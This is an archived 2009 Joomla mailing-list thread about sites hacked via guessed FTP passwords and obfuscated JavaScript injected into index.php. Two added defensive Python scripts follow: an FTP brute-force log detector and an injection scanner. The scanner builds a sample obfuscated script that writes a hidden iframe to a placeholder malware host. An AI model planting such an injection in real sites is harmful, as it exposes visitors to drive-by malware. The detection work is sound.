NYCPHP Meetup

NYPHP.org

[joomla] several 1.0 sites hacked this week!

Mitch Pirtle mitch.pirtle at gmail.com
Thu Mar 26 20:40:33 EDT 2009


This information is unfortunately too late for Barrie, but I have
found vsftpd (Very Secure FTP Daemon) not only secure but wikkid fast
to boot. It supports SFTP, so folks that don't have SSH/SCP can still
use a half-decent client and run over a moderately encrypted
connection.

As for the defense of folks running PHP4, mass shared hosting, and
whatnot... I just made an off-hand comment a few seconds ago regarding
folks using outdated javascript menus that search bots could not
parse:

"If you're not keeping up with the times, don't expect your website to
perform well."

I cannot stress that enough. Seriously. Don't take your horse and cart
on the information superhighway; and if that is all you can afford,
perhaps you need to save up before you take that first ride, and for
certain stay well away from the fast lane. Just like starting a
business - if you cannot pony up the funds required to incorporate a
legitimate entity, don't expect to be treated like a legitimate
entity!

I know it may sound harsh, maybe I'm just grumpy from working too many hours.

-- Mitch, grumpy from working too many hours

2009/3/26 Barrie North <barrie at compassdesigns.net>:
> We found the attacks/IP in the server logs. A financially backed hacker
> outfit from Nigeria, go figure. The joys of having a PR9 site =P
>
> Our password was 10 chars including letters, numbers and punctuation. We are
> hosted on a "secured" rackspace server.
>
> We don't have FTP running any more!
>
> Barrie North
> ~Fully Managed Joomla Sites~
> www.simplweb.com/joomla
> ~Join the Community at compassdesigns.net~
> www.compassdesigns.net/join-the-community.html
>
>
> On Thu, Mar 26, 2009 at 7:29 PM, Atir Javid <atirjavid at gmail.com> wrote:
>>
>> Hello Barrie,
>>
>> May I inquire as to how you verified the attack?  I know that FTP
>> bruteforcing is extremely difficult, and that is very improbable.
>> What you may have faced was a dictionary attack, which may have worked
>> with some luck if you had a weak password.  A password including a mix
>> of
>>
>> 1) UPPERCASE
>> 2) lowercase
>> 3) punctuation/!#$.,
>> 4) numbers
>>
>> and have a good strong/long password you would never fall victim to
>> dictionary.
>>
>> As for bruteforce, an ftpd simply denies access after 3 or 5
>> (configurable, usually defaults to 3) failed login attempts for some
>> time.  Some hosts go as far as restricting ftp access until you call
>> them and verify the problem.  Also, brute forcing over a TCP pipe a
>> slow protocol such as FTP is virtually impossible.  At this rate it
>> would take YEARS to bruteforce the password if not DECADES.
>>
>> @ Other users
>> Also make sure to go into joomla user configuration and change the
>> username of 'admin' to something else.
>> To protect your Joomla administration section, if you have a static IP,
>> you can add
>>
>> order allow,deny
>> deny from all
>> allow from your.static.ip.here
>>
>> to a file called .htaccess in your administration folder.  If for some
>> reason your ip changes and you get locked out, simply login via FTP
>> and update the .htaccess file.  There are some other advanced methods
>> for protecting your administration folder.
>>
>> Also, FTP was a protocol developed 30+ years ago.  It is not secure,
>> clear text authentication, etc.  FTP must go.  If you can help it, do
>> not use ftp, instead SFTP, or SSH.  Just.. anything but FTP.  Sadly,
>> that's all that is easy to use, highly available across all hosts, and
>> not everyone on shared hosting provides SSH access.  If you can do
>> without it, do without it. http://wooledge.org/mywiki/FtpMustDie
>>
>> I have seen more sites hacked due to unpatched PHP or bad PHP
>> code (mostly from 3rd party addons) than I have with FTP, though.
>>
>> Still with good security practices you can reduce the risk considerably.
>>
>> Peace.
>>
>>
>>
>>
>> 2009/3/26 Barrie North <barrie at compassdesigns.net>:
>> > We got hacked last month by a brute force attack on our FTP password.
>> > Once
>> > they had that, they got into the Joomla files.
>> >
>> > Any site can be hacked. The other half of the equation is vigilance and
>> > backups :)
>> >
>> > Barrie North
>> > ~Fully Managed Joomla Sites~
>> > www.simplweb.com/joomla
>> > ~Join the Community at compassdesigns.net~
>> > www.compassdesigns.net/join-the-community.html
>> >
>> >
>> > On Wed, Mar 25, 2009 at 11:23 PM, Mark Simko <masimko at verizon.net>
>> > wrote:
>> >>
>> >> Several of my clients' 1.0.15 sites have been hacked this week!  Is
>> >> there a problem with 1.0?
>> >>
>> >> I don't see an announcement on joomla.org
>> >>
>> >> I just saw that my site was hacked the other day. Fortunately they
>> >> bunged it up a bit, so the code didn't run, but instead gave an error
>> >> message.
>> >>
>> >> What they had done is append javascript to the index.php file. It was
>> >> disguised as ASCII codes, and there were several vars defined and
>> >> substituted in, but the result was that it attempted to open a hidden
>> >> iframe directed to siplank.com. When I tried to open siplank.com in a
>> >> web browser (yes, I did that! I do lots of crazy things out of
>> >> curiosity) Firefox stopped it with a warning about the site being known
>> >> for malware.
>> >>
>> >> I'm running 1.5.9 on a shared host. I will be calling my host and
>> >> asking
>> >> them what they can find out from their logs as to what happened.
>> >>
>> >> _______________________________________________
>> >> New York PHP SIG: Joomla! Mailing List
>> >> http://lists.nyphp.org/mailman/listinfo/joomla
>> >>
>> >> NYPHPCon 2006 Presentations Online
>> >> http://www.nyphpcon.com
>> >>
>> >> Show Your Participation in New York PHP
>> >> http://www.nyphp.org/show_participation.php
>> >
>> >
>
>

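Barrie says the attacking IP turned up in the server logs, and Atir describes the lockout an ftpd applies after a few failed logins. The script below is an added example, not code from anyone in the thread: it reads vsftpd-style log lines, flags any client that racks up a burst of FAIL LOGIN entries, and notes whether an OK LOGIN followed the burst, which is the "they got the password" case rather than plain noise. The log lines are constructed in the vsftpd.log layout, and the threshold (5) and window (10 minutes) are assumed values, not something a poster specified.

```python
"""Flag FTP password guessing in vsftpd-style logs.

Added example for this thread (not code from any poster).  The log lines
are constructed in the vsftpd.log layout: `<date> [pid N] [user] FAIL LOGIN:
Client "ip"` / `OK LOGIN: Client "ip"`.  Threshold and window are assumed
values, not anything a poster specified.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOGIN_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2} \d{4}) '
    r'\[pid \d+\] \[(?P<user>[^\]]*)\] '
    r'(?P<event>OK LOGIN|FAIL LOGIN): Client "(?P<ip>[^"]+)"'
)

# Constructed sample: one client guessing the "barrie" password and getting
# in on the seventh try, one legitimate user who mistyped once, plus a
# CONNECT line that the login regex deliberately ignores.
SAMPLE_LOG = [
    'Thu Mar 26 19:01:02 2009 [pid 4120] [barrie] FAIL LOGIN: Client "198.51.100.7"',
    'Thu Mar 26 19:01:05 2009 [pid 4121] [barrie] FAIL LOGIN: Client "198.51.100.7"',
    'Thu Mar 26 19:01:08 2009 [pid 4122] [barrie] FAIL LOGIN: Client "198.51.100.7"',
    'Thu Mar 26 19:01:11 2009 [pid 4123] [admin] FAIL LOGIN: Client "198.51.100.7"',
    'Thu Mar 26 19:01:14 2009 [pid 4124] [barrie] FAIL LOGIN: Client "198.51.100.7"',
    'Thu Mar 26 19:01:17 2009 [pid 4125] [barrie] FAIL LOGIN: Client "198.51.100.7"',
    'Thu Mar 26 19:01:20 2009 [pid 4126] [barrie] OK LOGIN: Client "198.51.100.7"',
    'Thu Mar 26 19:05:00 2009 [pid 4200] CONNECT: Client "203.0.113.5"',
    'Thu Mar 26 19:05:03 2009 [pid 4200] [barrie] FAIL LOGIN: Client "203.0.113.5"',
    'Thu Mar 26 19:05:09 2009 [pid 4200] [barrie] OK LOGIN: Client "203.0.113.5"',
]


def parse_login(line):
    """Return {ts, user, event, ip} for an OK/FAIL LOGIN line, else None."""
    m = LOGIN_RE.match(line)
    if not m:
        return None
    return {
        'ts': datetime.strptime(m.group('ts'), '%a %b %d %H:%M:%S %Y'),
        'user': m.group('user'),
        'event': m.group('event'),
        'ip': m.group('ip'),
    }


def find_password_guessing(lines, threshold=5, window=timedelta(minutes=10)):
    """Report every client IP with >= threshold failed logins inside window.

    Each report carries the peak failure count inside one window, the
    usernames tried, and whether an OK LOGIN followed the burst (the
    pattern from the thread: a guessed password, not just noise)."""
    events = sorted((e for e in map(parse_login, lines) if e), key=lambda e: e['ts'])
    recent_fails = defaultdict(list)   # ip -> failure timestamps still inside the window
    users = defaultdict(set)
    reports = {}
    for e in events:
        ip = e['ip']
        users[ip].add(e['user'])
        fails = [t for t in recent_fails[ip] if e['ts'] - t <= window]
        if e['event'] == 'FAIL LOGIN':
            fails.append(e['ts'])
            if len(fails) >= threshold:
                r = reports.setdefault(ip, {'failures': 0, 'success_after_burst': False})
                r['failures'] = max(r['failures'], len(fails))
        elif ip in reports and len(fails) >= threshold:
            # OK LOGIN while the failure burst is still inside the window
            reports[ip]['success_after_burst'] = True
        recent_fails[ip] = fails
    for ip, r in reports.items():
        r['users'] = sorted(users[ip])
    return reports


if __name__ == '__main__':
    for ip, r in find_password_guessing(SAMPLE_LOG).items():
        print(ip, r)
```

Run it against a real vsftpd.log by replacing SAMPLE_LOG with the file's lines; a report whose success_after_burst is True is the one to act on first, since it means the guessing worked and the uploaded files need checking, not just the IP blocking.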

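Mark describes the payload he found: JavaScript appended to index.php, disguised as ASCII codes, with several vars defined and substituted in, that opens a hidden iframe to a malware domain. The scanner below is an added example, not code from anyone in the thread. Rather than grepping for a domain, it emulates just the constructs Mark describes (String.fromCharCode lists, string vars glued together with +, document.write), plus \xNN escapes and unescape(), so it sees the iframe the browser would see; eval() and anything else it does not know is left in place as a marker. The sample index.php, the injected script and the domain malware.invalid are constructed for the example, not taken from a real site.

```python
"""Find obfuscated hidden-iframe injections in PHP files.

Added example for this thread (not a poster's code).  It emulates only the
JavaScript constructs Mark describes (String.fromCharCode lists, string
vars glued together, document.write), plus \\xNN escapes and unescape().
The sample file and the domain are constructed.
"""
import re
from urllib.parse import unquote, urlparse

SCRIPT_RE = re.compile(r'<script[^>]*>(.*?)</script>', re.I | re.S)
FROMCHARCODE_RE = re.compile(r'String\.fromCharCode\(([\d,\s]*)\)')
IFRAME_RE = re.compile(r'<iframe[^>]*>', re.I)
HIDDEN_RE = re.compile(
    r'visibility\s*:\s*hidden|display\s*:\s*none|(?:width|height)\s*=\s*["\']?0\b', re.I)
SRC_RE = re.compile(r'src\s*=\s*["\']?([^"\'\s>]+)', re.I)


def split_top(text, sep):
    """Split on `sep` outside quotes and brackets, honouring backslash escapes."""
    parts, cur, depth, quote, esc = [], [], 0, None, False
    for ch in text:
        if quote:
            if esc:
                esc = False
            elif ch == '\\':
                esc = True
            elif ch == quote:
                quote = None
        elif ch in '"\'':
            quote = ch
        elif ch in '([':
            depth += 1
        elif ch in ')]':
            depth -= 1
        elif ch == sep and depth == 0:
            parts.append(''.join(cur))
            cur = []
            continue
        cur.append(ch)
    parts.append(''.join(cur))
    return parts


def unescape_js(s):
    """Resolve \\xNN, \\uNNNN and simple backslash escapes in a JS string body."""
    def repl(m):
        e = m.group(1)
        if e[0] in 'xu':
            return chr(int(e[1:], 16))
        return {'n': '\n', 'r': '\r', 't': '\t'}.get(e, e)
    return re.sub(r'\\(x[0-9a-fA-F]{2}|u[0-9a-fA-F]{4}|.)', repl, s)


def eval_term(term, env):
    """One operand of a + chain: char-code list, unescape(), literal or var name."""
    term = term.strip()
    m = FROMCHARCODE_RE.fullmatch(term)
    if m:
        return ''.join(chr(int(c)) for c in m.group(1).split(',') if c.strip())
    m = re.fullmatch(r'unescape\((.+)\)', term, re.S)
    if m:
        return unquote(eval_expr(m.group(1), env))
    if len(term) >= 2 and term[0] == term[-1] and term[0] in '"\'':
        return unescape_js(term[1:-1])
    return env.get(term, '{' + term + '}')   # unknown construct: keep a marker, keep going


def eval_expr(expr, env):
    return ''.join(eval_term(t, env) for t in split_top(expr, '+'))


def emulate_script(js):
    """Return what the script would document.write(), tracking `var x = expr;`."""
    env, written = {}, []
    for stmt in split_top(js, ';'):
        stmt = stmt.strip()
        m = re.fullmatch(r'var\s+([A-Za-z_$][\w$]*)\s*=\s*(.+)', stmt, re.S)
        if m:
            env[m.group(1)] = eval_expr(m.group(2), env)
            continue
        m = re.fullmatch(r'document\.write\((.+)\)', stmt, re.S)
        if m:
            written.append(eval_expr(m.group(1), env))
    return ''.join(written)


def scan_php_source(source):
    """List iframes each <script> block would write, noting whether the block sits
    after the last `?>` (appended, as in the thread) and whether it used char codes."""
    findings, last_close = [], source.rfind('?>')
    for m in SCRIPT_RE.finditer(source):
        js = m.group(1)
        for tag in IFRAME_RE.findall(emulate_script(js)):
            src = SRC_RE.search(tag)
            url = src.group(1) if src else ''
            findings.append({
                'src': url,
                'host': urlparse(url).hostname or '',
                'hidden': bool(HIDDEN_RE.search(tag)),
                'appended': m.start() > last_close,
                'obfuscated': bool(FROMCHARCODE_RE.search(js) or '\\x' in js),
            })
    return findings


def _charcodes(s):
    return 'String.fromCharCode(' + ','.join(str(ord(c)) for c in s) + ')'


# Constructed sample: a minimal Joomla 1.0-style index.php with the injected
# script appended after the closing ?>.  The domain is a placeholder.
INFECTED_INDEX = (
    "<?php\ndefine('_VALID_MOS', 1);\nrequire_once('globals.php');\n?>\n"
    "<script>var a=" + _charcodes('<iframe src="') + ";"
    "var b='http://malware.invalid/in.php';"
    "var c=" + _charcodes('" width=0 height=0 style="visibility:hidden"></iframe>') + ";"
    "document.write(a+b+c);</script>\n"
)
CLEAN_INDEX = "<?php\ndefine('_VALID_MOS', 1);\nrequire_once('globals.php');\n?>\n"

if __name__ == '__main__':
    for f in scan_php_source(INFECTED_INDEX):
        print(f)
```

Point scan_php_source at the contents of every .php file under the web root (index.php first, since that is where Mark found it) and treat a hidden iframe in a script that sits after the last `?>` as the strongest signal; an unknown construct shows up as a {name} marker in the decoded output rather than being silently dropped, so a script the emulator cannot fully decode still stands out for manual review.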
